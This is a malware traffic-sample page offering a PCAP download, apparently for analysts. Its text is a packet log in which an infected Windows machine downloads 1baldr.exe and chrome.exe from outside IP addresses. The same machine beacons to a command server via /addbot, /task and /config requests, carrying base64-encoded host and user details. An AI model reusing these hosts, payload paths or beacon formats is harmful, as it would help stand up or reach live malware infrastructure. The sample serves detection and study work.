Text Example

New Ransomware Variant POST /addbot? 51.255.203.164 95.81.0.83 PCAP Download Traffic Sample

Download Attachments

  • 1 pcap 1baldr
    Date added: May 22, 2019 5:33 am Added by: admin File size: 14 MB Downloads: 28

2019-05-21 22:33:27.228144 IP 10.1.10.162.53173 > 95.81.0.83.80: Flags [P.], seq 1:538, ack 1, win 16425, length 537: HTTP: GET /baldr/1baldr.exe HTTP/1.1
E..A`.@…#.
.
._Q.S…P……..P.@).M..GET /baldr/1baldr.exe HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, /
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Range: bytes=115032-
Unless-Modified-Since: Tue, 14 May 2019 17:00:02 GMT
If-Range: “bf600-588dbf6c43571”
Host: 95.81.0.83
Connection: Keep-Alive

2019-05-21 22:37:04.849374 IP 10.1.10.162.53175 > 51.255.203.164.80: Flags [P.], seq 1:530, ack 1, win 16425, length 529: HTTP: POST /bundles/sensiodistribution/webconfigurator/bild.exe HTTP/1.1
E..9bM@….+
.
.3……P..<Y..n.P.@)`D..POST /bundles/sensiodistribution/webconfigurator/bild.exe HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: 51.255.203.164
Connection: Keep-Alive
Cache-Control: no-cache


.
.3……P..>j..o.P.?………..
2019-05-21 22:37:05.152308 IP 95.81.1.51.80 > 10.1.10.162.53176: Flags [S.], seq 1042536569, ack 1776458428, win 29200, options [mss 1410,nop,nop,sackOK,nop,wscale 7], length 0
E .4..@.1..}_Q.3
.
..P..>#.yi…..r……………..
2019-05-21 22:37:05.152555 IP 10.1.10.162.53176 > 95.81.1.51.80: Flags [.], ack 1, win 16567, length 0
E..(bP@…#Y
.
._Q.3…Pi…>#.zP.@………..
2019-05-21 22:37:05.152721 IP 10.1.10.162.53176 > 95.81.1.51.80: Flags [P.], seq 1:482, ack 1, win 16567, length 481: HTTP: POST /suicide HTTP/1.1
E.. bQ@…!w
.
._Q.3…Pi…>#.zP.@.d…POST /suicide HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: 95.81.1.51
Connection: Keep-Alive
Cache-Control: no-cache


..P..>#.zi…P…6…HTTP/1.1 200 OK
Date: Wed, 22 May 2019 02:37:05 GMT
Server: Apache/2.4.10 (Debian)
Content-Length: 9
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

ZmFsc2U=

2019-05-21 22:37:05.359519 IP 10.1.10.162.53176 > 95.81.1.51.80: Flags [P.], seq 482:962, ack 213, win 16514, length 480: HTTP: POST /config HTTP/1.1
E…bS@…!v
.
._Q.3…Pi…>#.NP.@.7…POST /config HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: 95.81.1.51
Connection: Keep-Alive
Cache-Control: no-cache

2019-05-21 22:37:08.535915 IP 10.1.10.162.53178 > 95.81.1.51.80: Flags [P.], seq 482:962, ack 213, win 16514, length 480: HTTP: POST /config HTTP/1.1
E…b^@…!k
.
._Q.3…Pl……fP.@.L…POST /config HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: 95.81.1.51
Connection: Keep-Alive
Cache-Control: no-cache


Content-Length: 4
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

0100
2019-05-21 22:37:08.932325 IP 10.1.10.162.53178 > 95.81.1.51.80: Flags [.], ack 419, win 16463, length 0
E..(b_@…#J
.
.Q.3…Pl..…4P.@O……….
2019-05-21 22:37:09.155121 IP 10.1.10.162.53178 > 95.81.1.51.80: Flags [P.], seq 962:1742, ack 419, win 16463, length 780: HTTP: POST /addbot?hwid=ZjJiYzJiMGItYzcyNi00ZWEyLThmN2QtNWMzMDU0ZDhmYTFm&bit=eDY0&win=V2luZG93cyA3IFByb2Zlc3Npb25hbA==&cpu=SW50ZWwoUikgWGVvbihSKSBDUFUgICAgICAgICAgIEU1NTQwICBAIDIuNTNHSHoA&gpu=U3RhbmRhcmQgVkdBIEdyYXBoaWNzIEFkYXB0ZXI=&av=VW5rbm93bg==&filename=d2lubG9nb24uZXhl&username=cnk0d24= HTTP/1.1
E..4b`@… =
.
.Q.3…Pl..…4P.@OO…POST /addbot?hwid=ZjJiYzJiMGItYzcyNi00ZWEyLThmN2QtNWMzMDU0ZDhmYTFm&bit=eDY0&win=V2luZG93cyA3IFByb2Zlc3Npb25hbA==&cpu=SW50ZWwoUikgWGVvbihSKSBDUFUgICAgICAgICAgIEU1NTQwICBAIDIuNTNHSHoA&gpu=U3RhbmRhcmQgVkdBIEdyYXBoaWNzIEFkYXB0ZXI=&av=VW5rbm93bg==&filename=d2lubG9nb24uZXhl&username=cnk0d24= HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
User-Agent: Megumin/2.0
Host: 95.81.1.51
Connection: Keep-Alive

2019-05-21 22:37:09.923721 IP 10.1.10.162.53179 > 95.81.1.51.80: Flags [P.], seq 1:484, ack 1, win 16567, length 483: HTTP: POST /blacklist HTTP/1.1
E…bd@…!b
.
._Q.3…P..zB..’.P.@…..POST /blacklist HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: 95.81.1.51
Connection: Keep-Alive
Cache-Control: no-cache

–1BEF0A57BE110FD467A–

2019-05-21 22:37:09.923733 IP 10.1.10.162.53178 > 95.81.1.51.80: Flags [P.], seq 2225:2757, ack 829, win 16360, length 532: HTTP: POST /task?hwid=ZjJiYzJiMGItYzcyNi00ZWEyLThmN2QtNWMzMDU0ZDhmYTFm HTTP/1.1
E..<be@…!0
.
._Q.3…Pl. N….P.?..h..POST /task?hwid=ZjJiYzJiMGItYzcyNi00ZWEyLThmN2QtNWMzMDU0ZDhmYTFm HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: 95.81.1.51
Connection: Keep-Alive
Cache-Control: no-cache


Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

2019-05-21 22:37:10.143233 IP 95.81.1.51.80 > 10.1.10.162.53178: Flags [.], ack 2757, win 282, length 0
E .(..@.1. ._Q.3
.
..P……l.”bP…V………
2019-05-21 22:37:10.149580 IP 10.1.10.162.53179 > 95.81.1.51.80: Flags [P.], seq 484:961, ack 205, win 16516, length 477: HTTP: POST /cpu HTTP/1.1
E…bf@…!f
.
._Q.3…P..|%..(.P.@…..POST /cpu HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: 95.81.1.51
Connection: Keep-Alive
Cache-Control: no-cache

2019-05-21 22:37:10.477779 IP 10.1.10.162.53181 > 31.204.154.75.80: Flags [P.], seq 1:488, ack 1, win 16425, length 487: HTTP: POST /chrome.exe HTTP/1.1
E…bm@…..
.
….K…P…u2..&P.@)….POST /chrome.exe HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: 31.204.154.75
Connection: Keep-Alive
Cache-Control: no-cache


.
….K…P…\2..6P………….
2019-05-21 22:37:11.429668 IP 10.1.10.162.53181 > 31.204.154.75.80: Flags [.], ack 684741, win 55253, length 0
E..(c.@…..
.
….K…P…\2…P…y………
2019-05-21 22:37:11.429737 IP 10.1.10.162.53181 > 31.204.154.75.80: Flags [.], ack 684741, win 65335, length 0
E..(c.@…..
.
….K…P…\2…P..7Q………
2019-05-21 22:37:11.431998 IP 10.1.10.162.53178 > 95.81.1.51.80: Flags [P.], seq 2757:3306, ack 1093, win 16294, length 549: HTTP: POST /completed?hwid=ZjJiYzJiMGItYzcyNi00ZWEyLThmN2QtNWMzMDU0ZDhmYTFm&taskId=MTE= HTTP/1.1
E..Mc.@… .
.
._Q.3…Pl.”b….P.?..Q..POST /completed?hwid=ZjJiYzJiMGItYzcyNi00ZWEyLThmN2QtNWMzMDU0ZDhmYTFm&taskId=MTE= HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: 95.81.1.51
Connection: Keep-Alive
Cache-Control: no-cache

Leave a Reply